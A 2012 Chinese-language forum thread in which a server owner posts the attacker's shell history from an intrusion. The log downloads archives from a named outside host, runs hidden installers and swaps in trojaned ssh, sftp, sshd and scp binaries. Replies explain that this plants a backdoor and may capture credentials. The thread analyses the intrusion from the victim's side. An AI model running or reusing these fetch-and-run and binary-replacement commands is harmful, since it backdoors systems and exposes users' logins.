討論群組
小惡魔市集 悅遊日本 活動報導
我要回覆
llq1999
llq1999
0分
樓主
llq1999
llq1999
個人積分:0分
文章編號:36350903

救命啊!!! 我被駭客入侵,請問他是想作什麼嗎?

  • 2012-06-06 8:45
  • 4444
救命啊!!! 我被駭客入侵,請問他是想作什麼嗎?
他的指令如下

964 wget ciorexu.webs.com/s.tgz
965 tar xzvf s.tgz
966 rm -rf s.tgz
967 cd .s
968 ./inst
969 cd ..
970 wget ciorexu.webs.com/b.tgz
971 tar xzvf b.tgz
972 rm -rf b.tgz
973 cd .b
974 ls -a
975 ./inst
976 service sshd restart
2012-06-06 8:45 #1
文章關鍵字
救命 駭客
slash410
slash410
5317分
2樓
slash410
slash410
個人積分:5317分
文章編號:36351302


簡單的說..."埋後門"


而且把您機器的一些資訊mail給 "ciorexu@gmail.com"
2012-06-06 9:09 #2
llq1999
llq1999
0分
樓主
llq1999
llq1999
個人積分:0分
文章編號:36351806
mv ssh /usr/bin/ssh
mv sftp /usr/bin/sftp
mv sshd /usr/sbin/sshd
mv scp /usr/bin/scp

經過我徹夜研究,她只換了四樣常用的指令應該無大礙吧?
2012-06-06 9:34 #3
dhajmd
dhajmd
181分
4樓
dhajmd
dhajmd
個人積分:181分
文章編號:36351987
964 wget ciorexu.webs.com/s.tgz => 從 ciorexu.webs.com 去下載 s.tgz 檔
965 tar xzvf s.tgz => 解壓縮
966 rm -rf s.tgz => 刪除 s.tgz 檔
967 cd .s => .s(是一個隱藏資料夾), 進入這個資料夾
968 ./inst => 執行 inst 這個檔案
969 cd .. => 跳出
970 wget ciorexu.webs.com/b.tgz
971 tar xzvf b.tgz
972 rm -rf b.tgz
973 cd .b
974 ls -a
975 ./inst
976 service sshd restart => 重新啟動 sshd 服務,

sshd 主要是可以遠端控制對方的電腦...所以你被駭了
2012-06-06 9:41 #4
slash410
slash410
5317分
5樓
slash410
slash410
個人積分:5317分
文章編號:36352123

llq1999 wrote:
mv ssh /usr/bin/ssh
mv sftp /usr/bin/sftp
mv sshd /usr/sbin/sshd
mv scp /usr/bin/scp

經過我徹夜研究,她只換了四樣常用的指令應該無大礙吧?



他是用"他的"ssh, sftp, sshd, scp來取代你的...
因為"他的"是binary (在b.tgz裡)
不知道有沒有動過手腳, 說不定是加個log..紀錄你打進去的帳號密碼...
2012-06-06 9:47 #5
北宜之虎
北宜之虎
4分
6樓
北宜之虎
北宜之虎
個人積分:4分
文章編號:36352473
我比較好奇的是

如何知道被駭客入侵?

前陣子D槽莫名其妙多了4~5個檔名不同資料夾

但是裡面都是放相同檔案MRT.exe

去開啟執行該程式也沒有異狀

用防毒(小紅傘)掃也無異狀

刪除也無異狀

請問我是被駭了嗎?

2012-06-06 10:03 #6
lin640505
lin640505
0分
7樓
lin640505
lin640505
個人積分:0分
文章編號:36353772

北宜之虎 wrote:
我比較好奇的是如何知...(恕刪)


那些是每次微軟更新會有新的"惡意軟體移除程式"(KB890830),請不用擔心
2012-06-06 11:02 #7
llq1999
llq1999
0分
樓主
llq1999
llq1999
個人積分:0分
文章編號:36639067
traceroute 駭客
to 66.195.148.66 (66.195.148.66), 30 hops max, 40 byte packets
1 * * *
3 tpdt-3308.hinet.net (168.95.229.10) 34.983 ms 36.184 ms 37.685 ms
4 TPDT-3012.hinet.net (220.128.2.70) 40.181 ms 44.426 ms 45.060 ms
5 r4101-s2.tp.hinet.net (220.128.7.193) 42.598 ms 43.775 ms 45.048 ms
6 r4001-s2.tp.hinet.net (220.128.6.77) 46.261 ms 29.745 ms 30.089 ms
7 r11-pa.us.hinet.net (211.72.108.197) 159.413 ms 159.435 ms 160.094 ms
8 r01-la.us.hinet.net (202.39.83.229) 171.945 ms 170.619 ms 170.916 ms
9 eqx.10ge.lax.bboi.net (206.223.123.59) 174.790 ms 174.262 ms 174.837 ms
10 66.186.192.61 (66.186.192.61) 173.473 ms 173.672 ms 171.518 ms
11 phx-ten2-1-la-ten3-3.bboi.net (64.127.128.146) 180.140 ms 234.755 ms 235.549 ms
12 dal-ten2-4-phx-ten1-1.bboi.net (64.127.128.237) 259.975 ms 247.209 ms 247.656 ms
13 nsh-ten1-4-dal-ten2-1.bboi.net (64.127.130.49) 260.427 ms 256.076 ms 257.055 ms
14 64.127.129.142 (64.127.129.142) 266.334 ms 265.708 ms 267.018 ms
15 10ge9-1.newsw1.core.fuse.net (216.68.6.234) 255.218 ms 247.512 ms 305.037 ms
16 10ge8-4.sw2.core.fuse.net (216.68.7.232) 304.470 ms 320.668 ms 321.065 ms
17 edge5-g1-1.dist.fuse.net (216.68.7.54) 321.192 ms 306.640 ms 307.486 ms
18 fuse-dedicated-69-61-207-122.fuse.net (69.61.207.122) 310.425 ms 357.262 ms 357.824 ms
19 66-195-148-66.static.twtelecom.net (66.195.148.66) 358.482 ms 357.862 ms 356.937 ms

The server IP Address is 66.195.148.66 and 66.195.148.66 resides on Triplefin LLC in Cincinnati, OH, United States.

2012-06-19 17:49 #8
ragnayao
ragnayao
5分
9樓
ragnayao
ragnayao
個人積分:5分
文章編號:36650462
他想拉你變共犯

不過,這駭客…不會擦屁股…有點遜
2012-06-20 8:45 #9
llq1999
llq1999
0分
樓主
llq1999
llq1999
個人積分:0分
文章編號:36673536
是的,不過她呼之欲出了,她設置了固定IP(static),從電信單位就可以查到了,我保留法律追溯權,因為懶的包機到OH,不然至少要所賠一億!!!
2012-06-21 8:53 #10
我要回覆

小惡魔廣編特輯

最新型態的電腦椅月付不用千元?!OSIM 天王工學椅實測,開箱「懂按摩」的人體工學椅
YAMAHA AUGUR 將科技智能融入日常騎乘!
MSI Katana 15 / Katana 17 揮舞效能之刃,開啟電競新戰場!
Samsung Galaxy Tab S11 Ultra 輕薄AI旗艦平板|帶來S Pen 全新進化,效率與生產力雙滿點!
文章分享
加入好友名單
取消 確定
評分
取消 確定
評分
取消 確定
複製連結
複製
留言回報
取消 確定

今日熱門文章 網友點擊推薦!